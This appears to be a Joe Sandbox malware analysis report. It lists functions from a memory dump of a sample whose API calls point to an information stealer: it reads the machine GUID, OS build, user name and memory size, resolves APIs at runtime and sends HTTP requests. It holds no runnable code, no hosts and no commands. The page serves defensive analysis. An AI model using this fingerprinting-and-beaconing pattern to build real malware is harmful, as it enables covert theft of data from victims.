Opcode Fuzzy Hash: 4e0b2a9fa014d04dc608629bf2a064b0b909d33fd9d9d0cde451eae06aa6f39a
Instruction Fuzzy Hash: 6181C272D10108AADB28FBA1D852DED7778AF54704F50813FB512728E2EF78664DCA98

Function 00403D70 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54stringnetworkCOMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT ref: 00403DA2
??_U@YAPAXI@Z.MSVCRT ref: 00403DAF
??_U@YAPAXI@Z.MSVCRT ref: 00403DBC
lstrlenA.KERNEL32(00000000,00000000,0000003C,00000000,?,00000030), ref: 00403DD6
InternetCrackUrlA.WININET(00000000,00000000), ref: 00403DE6

Strings

<, xrefs: 00403D92
5P@, xrefs: 00403DCD, 00403DDD, 00403DFB

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: CrackInternetlstrlen
String ID: 5P@$<
API String ID: 1274457161-3404980136
Opcode ID: b40355fada1ffc56527410c68adb04c67878f60ba432074fde5fcccb0772e96d
Instruction ID: ffcd9b35b4bfddae0e9debaaaaff4d4a67ad705ebd42d737fa1e7e78837649a8
Opcode Fuzzy Hash: b40355fada1ffc56527410c68adb04c67878f60ba432074fde5fcccb0772e96d
Instruction Fuzzy Hash: 23113071D00208ABDB04EFA5DC85BDDB7B8EB44314F10513AFA15B7291EF745505CB98

Function 00410340 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 42registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00410365
RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,004201E9), ref: 00410382
RegQueryValueExA.KERNEL32(004201E9,MachineGuid,00000000,00000000,00000000,000000FF), ref: 004103A4
RegCloseKey.ADVAPI32(004201E9), ref: 004103AE
CharToOemA.USER32(00000000,?), ref: 004103C2

Strings

MachineGuid, xrefs: 0041039E
SOFTWARE\Microsoft\Cryptography, xrefs: 00410378

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: CharCloseOpenQueryValuememset
String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
API String ID: 2391366103-1211650757
Opcode ID: e700b7023bf9e8dbd497fbb4e43d42ebc614438fbdd82c04f2954e56f97c9238
Instruction ID: 782b84d42d0d06b912d34d3dac9a589f721f2d7cdf24700b86374e4a20e7c3f4
Opcode Fuzzy Hash: e700b7023bf9e8dbd497fbb4e43d42ebc614438fbdd82c04f2954e56f97c9238
Instruction Fuzzy Hash: E001D475A4030CBBDB60DB90DC4AFEEB778EB04700F100199F648A6081DBB46BC48B94

Function 00412FA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040F850: lstrcpyA.KERNEL32(00000000,?,?), ref: 0040F878

Part of subcall function 00405010: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405062
Part of subcall function 00405010: StrCmpCA.SHLWAPI(?,0251B748,?,?,?,?,?,?,?), ref: 0040507A
Part of subcall function 00405010: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004050A2
Part of subcall function 00405010: HttpOpenRequestA.WININET(00000000,GET,?,0251D9A0,00000000,00000000,-00400100,00000000), ref: 004050DC
Part of subcall function 00405010: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405100
Part of subcall function 00405010: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040510F

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00412FFA
lstrlenA.KERNEL32(00000000), ref: 00413011

Part of subcall function 00410DA0: LocalAlloc.KERNEL32(00000040,?,?,00000000,00000030,?,00413026,00000000,00000000), ref: 00410DBC

StrStrA.SHLWAPI(00000000,00000000), ref: 00413039
lstrlenA.KERNEL32(00000000), ref: 0041304E
lstrlenA.KERNEL32(00000000), ref: 0041306B

Strings

ERROR, xrefs: 00412FEC, 00413076, 0041309D

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
String ID: ERROR
API String ID: 3240024479-2861137601
Opcode ID: e2f89366dcc4d114d7998f4201ca43f9f084b302062fecbe05f089ee6c8e62e7
Instruction ID: bd4d237804207bf9bc1d7224717f3b297064a78b5ccb05320e04b95c877dc140
Opcode Fuzzy Hash: e2f89366dcc4d114d7998f4201ca43f9f084b302062fecbe05f089ee6c8e62e7
Instruction Fuzzy Hash: E43180329001046BCB24FF71DC569EE37A8AE54704F40813AFD0672592EF386B488BA8

Function 004105A0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 004105B5
HeapAlloc.KERNEL32(00000000), ref: 004105BC

Part of subcall function 0040FA60: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 0040FA75
Part of subcall function 0040FA60: HeapAlloc.KERNEL32(00000000), ref: 0040FA7C
Part of subcall function 0040FA60: RegOpenKeyExA.KERNEL32(80000002,024F9398,00000000,00020119,?), ref: 0040FA9B
Part of subcall function 0040FA60: RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 0040FAB5
Part of subcall function 0040FA60: RegCloseKey.ADVAPI32(?), ref: 0040FABF

RegOpenKeyExA.KERNEL32(80000002,024F9398,00000000,00020119,00000000), ref: 004105F1
RegQueryValueExA.KERNEL32(00000000,0251D8C8,00000000,00000000,00000000,000000FF), ref: 0041060C
RegCloseKey.ADVAPI32(00000000), ref: 00410616

Strings

Windows 11, xrefs: 004105D0

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3466090806-2517555085
Opcode ID: a47b1fee11c922904502344837a3ea91d47d8b4281bde6fd73d92917b4b8e5ca
Instruction ID: 6a00dca0351ba1f1b5825a2528416373370fab3b8fd5f0a2b799655d5a0aabf6
Opcode Fuzzy Hash: a47b1fee11c922904502344837a3ea91d47d8b4281bde6fd73d92917b4b8e5ca
Instruction Fuzzy Hash: 1201D67160020CBBD710EBA4EC49EBB777EEB44305F00516AFA09D7250D7B499808BE0

Function 0040FA60 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 0040FA75
HeapAlloc.KERNEL32(00000000), ref: 0040FA7C
RegOpenKeyExA.KERNEL32(80000002,024F9398,00000000,00020119,?), ref: 0040FA9B
RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 0040FAB5
RegCloseKey.ADVAPI32(?), ref: 0040FABF

Strings

CurrentBuildNumber, xrefs: 0040FAAF

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: Heap$AllocCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3466090806-1022791448
Opcode ID: 7b7d1b79e19f05ca12c8064292c75d5cc37a930701fe9e474d57c854d10d4e52
Instruction ID: a1553181ab18edaa3b94d53bb79d7bf4b62666c9831d6ad32faf63d23f73e213
Opcode Fuzzy Hash: 7b7d1b79e19f05ca12c8064292c75d5cc37a930701fe9e474d57c854d10d4e52
Instruction Fuzzy Hash: 98F062B5A41318BBD710ABE0AC0AFAB7B7DEB44755F002169FB05A6181D7B45A4087E1

Function 0040FED0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,TimeZone: ,00000000,?,00423408,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00423408), ref: 0040FEDE
HeapAlloc.KERNEL32(00000000,?,TimeZone: ,00000000,?,00423408,00000000,?,00000000,00000000,?,Local Time: ,00000000,?,00423408,00000000), ref: 0040FEE5
GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 0040FF05
wsprintfA.USER32 ref: 0040FF2B

Strings

@, xrefs: 0040FEFE
%d MB, xrefs: 0040FF25

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
String ID: %d MB$@
API String ID: 3644086013-3474575989
Opcode ID: c91f0ec11f474d8c1381f109a4bcd534d4041cf4b5121d99c497be17c465c294
Instruction ID: af9ca1c618701aaf6e1e57e94b25e62574dec66522ec45beacafd1b49d2b4fa6
Opcode Fuzzy Hash: c91f0ec11f474d8c1381f109a4bcd534d4041cf4b5121d99c497be17c465c294
Instruction Fuzzy Hash: ACF062B1A40218ABE714ABA4DC0AFBE77ADFB01345F401129F706E61C0D7B89C0187E5

Function 004158B0 Relevance: 9.1, APIs: 6, Instructions: 130registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004158D5
RegOpenKeyExA.KERNEL32(80000001,0251E250,00000000,00020119,?), ref: 004158F4
RegQueryValueExA.ADVAPI32(?,0251DB38,00000000,00000000,00000000,000000FF), ref: 00415918
RegCloseKey.ADVAPI32(?), ref: 00415922
lstrcatA.KERNEL32(?,00000000,?,00000104), ref: 00415947
lstrcatA.KERNEL32(?,0251DAC0), ref: 0041595B

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: e8724204b0cc03fbcb6c851790506c737117de5578e94a03a6d4afcadaa9153a
Instruction ID: b2658f5a2186259637989032082ab400ffc55dd45aba0fd3878622be2ef6c76c
Opcode Fuzzy Hash: e8724204b0cc03fbcb6c851790506c737117de5578e94a03a6d4afcadaa9153a
Instruction Fuzzy Hash: BD41A3B5900208ABCF24EFA1CC46FDE3739AB85304F40865DFA5566191DB746AC8CFE5

Function 00406C20 Relevance: 9.1, APIs: 6, Instructions: 71filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,0040BA32,?,00000000,?,00000000,00000000), ref: 00406C3F
GetFileSizeEx.KERNEL32(00000000,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C55
LocalAlloc.KERNEL32(00000040,?,?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C70
ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406C89
LocalFree.KERNEL32(?,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CA9
CloseHandle.KERNEL32(00000000,?,0040BA32,?,00000000,?,00000000,00000000,?), ref: 00406CB1

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: ee52c6b3daa6949a696971c66fd235fc42eaf43d24144f866f82b16b6e88380c
Instruction ID: 5b08f293fa4d369547e293c080fd62cfee42250c67ac5e0144c02d8e3dd3972c
Opcode Fuzzy Hash: ee52c6b3daa6949a696971c66fd235fc42eaf43d24144f866f82b16b6e88380c
Instruction Fuzzy Hash: B011AF71604209AFEB10DF64DC85EBB77BEEB80344F10513EFA42A7290DB389D518BA4

Function 004175F0 Relevance: 9.1, APIs: 6, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 004176E0: GetProcAddress.KERNEL32(76210000,0251A840), ref: 00417748
Part of subcall function 004176E0: GetProcAddress.KERNEL32(76210000,0251A858), ref: 00417761
Part of subcall function 004176E0: GetProcAddress.KERNEL32(76210000,0251A870), ref: 00417779
Part of subcall function 004176E0: GetProcAddress.KERNEL32(76210000,0251A558), ref: 00417791
Part of subcall function 004176E0: GetProcAddress.KERNEL32(76210000,024F4C18), ref: 004177AA
Part of subcall function 004176E0: GetProcAddress.KERNEL32(76210000,024FAAE0), ref: 004177C2
Part of subcall function 004176E0: GetProcAddress.KERNEL32(76210000,024FA940), ref: 004177DA
Part of subcall function 004176E0: GetProcAddress.KERNEL32(76210000,0251A510), ref: 004177F3
Part of subcall function 004176E0: GetProcAddress.KERNEL32(76210000,0251A7B0), ref: 0041780B
Part of subcall function 004176E0: GetProcAddress.KERNEL32(76210000,0251A6C0), ref: 00417823
Part of subcall function 004176E0: GetProcAddress.KERNEL32(76210000,0251A540), ref: 0041783C
Part of subcall function 004176E0: GetProcAddress.KERNEL32(76210000,024FA7C0), ref: 00417854

Part of subcall function 0040F810: lstrcpyA.KERNEL32(00000000,0041760D,0041760D,004201E9), ref: 0040F839

Part of subcall function 0040FAE0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417612,004201E9), ref: 0040FAEC
Part of subcall function 0040FAE0: HeapAlloc.KERNEL32(00000000,?,?,?,00417612,004201E9), ref: 0040FAF3
Part of subcall function 0040FAE0: GetUserNameA.ADVAPI32(00000000,004201E9), ref: 0040FB07

Part of subcall function 0040F9A0: lstrlenA.KERNEL32(?,?,?,?,?,00417633,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 0040F9B9
Part of subcall function 0040F9A0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F9E1
Part of subcall function 0040F9A0: lstrcatA.KERNEL32(?,?), ref: 0040F9EB

Part of subcall function 0040F8F0: lstrcpyA.KERNEL32(00000000,?,004201E9), ref: 0040F930

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,024F4C58,?,00423414,?,00000000,004201E9), ref: 00417672
CloseHandle.KERNEL32(00000000), ref: 00417681
OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 00417697
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004176B1
CloseHandle.KERNEL32(00000000), ref: 004176BF
ExitProcess.KERNEL32 ref: 004176C7

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: AddressProc$Eventlstrcpy$CloseHandleHeapOpenProcess$AllocCreateExitNameUserlstrcatlstrlen
String ID:
API String ID: 1749527509-0
Opcode ID: b1e08a575f81a5c8ffce43e659a7b29aa0548e5616646b79b7a11235fb7a4075
Instruction ID: 13c05977e48a492468067969b5632ac7cddf019cfab1cdc1380e7e7caaa560eb
Opcode Fuzzy Hash: b1e08a575f81a5c8ffce43e659a7b29aa0548e5616646b79b7a11235fb7a4075
Instruction Fuzzy Hash: 11213B71A001087BDB14FBB1DC56FEE7378AF10704F50513AB606B24D2EF786A088AA9

Function 00419FE0 Relevance: 7.6, APIs: 5, Instructions: 134fileCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,00000030,?,0041B1A9,?,?,?,00000000), ref: 0041A035
CreateFileA.KERNEL32(?,40000000,00000000,00000000,0041B1A9,00000080,00000000,00000000,00000030,?,0041B1A9,?,?,?,00000000), ref: 0041A06F

Memory Dump Source

Source File: 0000000A.00000002.3351695759.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.3351695759.0000000000430000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000434000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000438000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000527000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000052A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000530000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000054F000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000056E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.0000000000607000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063B000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000A.00000002.3351695759.000000000063D000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_build_2024-07-25_20-56.jbxd

Yara matches

Similarity

API ID: File$CreatePointer
String ID:
API String ID: 2024441833-0
Opcode ID: 772bf794a0539b62a801477fbb62bcb276aa9b4d2b65757f9edafb53a070daec
Instruction ID: ed9b1ade8afe9e764bcb327c8eb7a8881111bfc1a91da69b80f20d04efd87e30
Opcode Fuzzy Hash: 772bf794a0539b62a801477fbb62bcb276aa9b4d2b65757f9edafb53a070daec
Instruction Fuzzy Hash: 10419472505704AFE7309F28A8C0BA7BBD8E754328F108A2FF159C6641D275DCD48B69

Function 6C27C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 6C27C947
VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6C27C969
GetSystemInfo.KERNEL32(?), ref: 6C27C9A9
VirtualFree.KERNEL32(00000000,?,00008000), ref: 6C27C9C8
VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6C27C9E2

Memory Dump Source

Source File: 0000000A.00000002.3456274721.000000006C261000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C260000, based on PE: true

